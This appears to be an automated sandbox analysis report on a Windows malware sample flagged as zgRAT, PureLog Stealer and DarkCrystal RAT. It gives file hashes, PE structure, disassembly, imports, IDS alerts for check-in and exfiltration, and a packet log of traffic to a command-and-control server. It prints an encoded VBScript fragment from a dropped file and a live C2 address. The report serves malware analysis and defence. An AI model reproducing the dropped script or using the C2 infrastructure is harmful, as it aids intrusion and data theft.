                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\providerBrowserruntimeCrt\Providerbroker.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..
                                                                                  Process:C:\Users\user\Desktop\9FwQYJSj4N.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):237
                                                                                  Entropy (8bit):5.933289769131268
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Gz2wqK+NkLzWbH+8nZNDd3RL1wQJRTog7UsAO6oWos:GPMCzWL+4d3XBJF5AOGX
                                                                                  MD5:3822081A726CF45F5A91C6BA974A3BDE
                                                                                  SHA1:EF5AB0FA613F78A981F4E9FA1C8314250005AA40
                                                                                  SHA-256:93E4B258974F799C2A141CF067F58EFAA8918D7168A4CBD183BB2A9522AC709D
                                                                                  SHA-512:D1F21A527614C29078DDE98FA2D4FAE8F29FFE7893319BFFBBD2DB29B94868B0B1043DDE689C38808DB35F0DE6546DA99A12AE8DF54A1643CE212CE3478AD24A
                                                                                  Malicious:false
                                                                                  Preview:#@~^1AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vcT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJw.K\bN+MAMGhk+.D!xOrs+ZMOzJ2rNqCt~C9ld.56:(hpKCogf!#Nv(r[_|5}c8mYEBPZ~P6l^d+CUUAAA==^#~@.
                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):502
                                                                                  Entropy (8bit):4.613055660879929
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:PJ75pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:hddUOAokItULVDv
                                                                                  MD5:BA57C35C880CE32BEBF26BD30E6FFB9A
                                                                                  SHA1:AC7A5CFA4421D714D0C1D29918BC13F4B438036C
                                                                                  SHA-256:C63D3363B61BF3717BE07449F88D342C3FB441D93FD5D036C5678E190339DA32
                                                                                  SHA-512:55BE70A45B88E3DF4CFE1A5B48922ECEF507C76312754C1BBF1AF990F5BAA8E910A84B4403CF10057FB57750AE77E10074E2E24D038F14CD7D4EA3071EC0F263
                                                                                  Malicious:false
                                                                                  Preview:..Pinging 134349 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):3.8871788402581697
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:9FwQYJSj4N.exe
                                                                                  File size:10'714'393 bytes
                                                                                  MD5:9342be038f6ff329aaffdc2626f8d145
                                                                                  SHA1:5e2bc708ba51774175679f7cde6c9900c957bb42
                                                                                  SHA256:396a47040ce6fbbaf684ae9d4c1abe7bc8901113d3c017f41276145d6a04a103
                                                                                  SHA512:a407ec677468268d7bebf3e8c4a9b8e4b6a02fd48f9de0b6cfeb2ddb4b96d37be3e4bc880f21557c2bab6fadff55c06d26d2f89b125c8d658291bcc5038ef120
                                                                                  SSDEEP:98304:uS4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCUj:J4rXbm08oLSYwuWkcfCmPXRaLLVCUj
                                                                                  TLSH:B8B6F106A9625E33C2663F359CE7152D83E0E6613A33EF4B3A1E56917C172709B172B3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                  Icon Hash:5171555151515149
                                                                                  Entrypoint:0x41f530
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                  Instruction
                                                                                  call 00007F7B8547DBABh
                                                                                  jmp 00007F7B8547D4BDh
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  push dword ptr [ebp+08h]
                                                                                  mov esi, ecx
                                                                                  call 00007F7B85470307h
                                                                                  mov dword ptr [esi], 004356D0h
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  mov esi, ecx
                                                                                  lea eax, dword ptr [esi+04h]
                                                                                  mov dword ptr [esi], 004356B8h
                                                                                  push eax
                                                                                  call 00007F7B8548094Fh
                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                  pop ecx
                                                                                  je 00007F7B8547D64Ch
                                                                                  push 0000000Ch
                                                                                  push esi
                                                                                  call 00007F7B8547CC09h
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0Ch
                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                  call 00007F7B85470282h
                                                                                  push 0043BEF0h
                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                  push eax
                                                                                  call 00007F7B85480409h
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0Ch
                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                  call 00007F7B8547D5C8h
                                                                                  push 0043C0F4h
                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                  push eax
                                                                                  call 00007F7B854803ECh
                                                                                  int3
                                                                                  jmp 00007F7B85481E87h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push 00422900h
                                                                                  push dword ptr fs:[00000000h]
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdc30.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x640000xdc300xde0002ebda78c8c6672a849e2c6c167a637eFalse0.8708474099099099data7.662760909642784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                  PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                  RT_ICON0x666180x92caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.000558837617755
                                                                                  RT_DIALOG0x6f8e40x286dataEnglishUnited States0.5092879256965944
                                                                                  RT_DIALOG0x6fb6c0x13adataEnglishUnited States0.60828025477707
                                                                                  RT_DIALOG0x6fca80xecdataEnglishUnited States0.6991525423728814
                                                                                  RT_DIALOG0x6fd940x12edataEnglishUnited States0.5927152317880795
                                                                                  RT_DIALOG0x6fec40x338dataEnglishUnited States0.45145631067961167
                                                                                  RT_DIALOG0x701fc0x252dataEnglishUnited States0.5757575757575758
                                                                                  RT_STRING0x704500x1e2dataEnglishUnited States0.3900414937759336
                                                                                  RT_STRING0x706340x1ccdataEnglishUnited States0.4282608695652174
                                                                                  RT_STRING0x708000x1b8dataEnglishUnited States0.45681818181818185
                                                                                  RT_STRING0x709b80x146dataEnglishUnited States0.5153374233128835
                                                                                  RT_STRING0x70b000x46cdataEnglishUnited States0.3454063604240283
                                                                                  RT_STRING0x70f6c0x166dataEnglishUnited States0.49162011173184356
                                                                                  RT_STRING0x710d40x152dataEnglishUnited States0.5059171597633136
                                                                                  RT_STRING0x712280x10adataEnglishUnited States0.49624060150375937
                                                                                  RT_STRING0x713340xbcdataEnglishUnited States0.6329787234042553
                                                                                  RT_STRING0x713f00xd6dataEnglishUnited States0.5747663551401869
                                                                                  RT_GROUP_ICON0x714c80x14data1.1
                                                                                  RT_MANIFEST0x714dc0x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                  DLLImport
                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-21T10:02:31.515294+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.54973489.23.96.18080TCP
                                                                                  2024-12-21T10:02:54.567893+01002048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)1192.168.2.54979889.23.96.18080TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 21, 2024 10:02:29.978266001 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:30.097752094 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:30.099123955 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:30.100028038 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:30.219482899 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:30.453583002 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:30.575831890 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:31.475451946 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:31.515294075 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:31.740101099 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:31.740257978 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:31.740331888 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:31.947110891 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.066755056 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:32.296614885 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.406435966 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:32.416224003 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:32.439299107 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.452769995 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.560434103 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:32.560518026 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.562841892 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.683845043 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:32.765929937 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:32.812143087 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.849848986 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.921731949 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:32.970948935 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.043149948 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.043164015 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.043176889 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.203216076 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:33.310826063 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.322869062 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.322916031 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.359023094 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:33.670953989 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.718403101 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:33.938683987 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:33.984038115 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.174393892 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:34.218416929 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.583419085 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.587768078 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.587904930 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.703128099 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:34.703255892 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.703413963 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.707912922 CET804973489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:34.709244967 CET4973480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.709356070 CET804974189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:34.709434986 CET4974180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:34.822911024 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:35.062254906 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:35.181972027 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:35.182010889 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:35.182039976 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:36.079175949 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:36.187189102 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:36.315866947 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:36.319422007 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:36.439326048 CET804974489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:36.443104982 CET4974480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:36.513549089 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:36.635992050 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:36.639238119 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:36.639297009 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:36.968291998 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:36.984210014 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:37.104099989 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:37.104137897 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:37.104171991 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.015741110 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.187174082 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.252110004 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.296724081 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.511385918 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.511598110 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.631427050 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.631514072 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.631613970 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.631620884 CET804975189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.631688118 CET4975180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.687810898 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.751107931 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.807450056 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.807549000 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.807656050 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:38.927201033 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:38.984097958 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:39.104422092 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:39.104454994 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:39.104482889 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:39.156024933 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:39.275600910 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:39.275715113 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:40.007849932 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:40.062181950 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:40.186721087 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:40.244170904 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:40.296540976 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:40.422753096 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:40.452778101 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:40.499692917 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.158329964 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.167370081 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.167630911 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.278685093 CET804975789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:41.278754950 CET4975780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.287209988 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:41.287286997 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.287386894 CET804975889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:41.287405968 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.287441015 CET4975880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.408023119 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:41.640348911 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:41.760112047 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:41.760148048 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:41.760178089 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:42.665683985 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:42.765275002 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:42.900325060 CET804976589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:42.953047991 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:43.041294098 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:43.160945892 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:43.161031008 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:43.161135912 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:43.280721903 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:43.515368938 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:43.635188103 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:43.635227919 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:43.635258913 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:44.546890020 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:44.741863966 CET4976580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:44.765286922 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:44.780072927 CET804976789.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:44.952964067 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.193048954 CET4976780192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.193351030 CET4977480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:02:45.312836885 CET804977489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:02:45.312916040 CET4977480192.168.2.589.23.96.180
